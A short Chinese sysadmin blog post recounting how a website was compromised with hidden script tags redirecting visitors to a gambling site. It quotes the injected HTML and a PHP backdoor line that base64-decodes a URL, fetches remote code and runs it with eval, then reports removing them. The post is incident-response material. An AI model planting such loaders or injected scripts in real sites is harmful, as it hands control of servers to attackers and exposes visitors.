网站被挂码（浏览器第一次打开会跳出博彩网站）
2013-10-11 14:04:41   来源：我爱运维网   评论：0 点击：

最近网站莫名奇妙的首页出现空白，同时发现搜索引擎收录的链接是一个博彩网站的内容，但链接地址却是我们网站的。
打开搜索引擎收录的链接地址，浏览器第一次打开会跳出博彩网站。查看网站源代码，发现源代码顶部有这样一段代码：
<div style='display:none'><script language='javascript' src='http://count21.51yes.com/click.aspx?id=214346876&logo=12' charset='gb2312'></script><script type='text/javascript' src='http://api.bctbbs.net/Bet/Seo.js'></script></div>

显然网站被人挂码了！找遍了所有文件，都没找到这代码是哪里来的（grep -r "Seo.js" *)。

查看最近修改过的文件，只有一个文件（init.xxx.php)修改过，看到一段不明白的代码：
eval(base64_decode(file_get_contents(base64_decode('aHR0cDovL2FwaS5iY3RiYnMubmV0L2JldC50eHQ='))));

这么一段代码！
应该是指向http://api.bctbbs.net/bet.txt，而这个txt文件的内容又是编码了的文件：总算找出来了.

清除掉就正常了。也有在config.php中挂码的哦。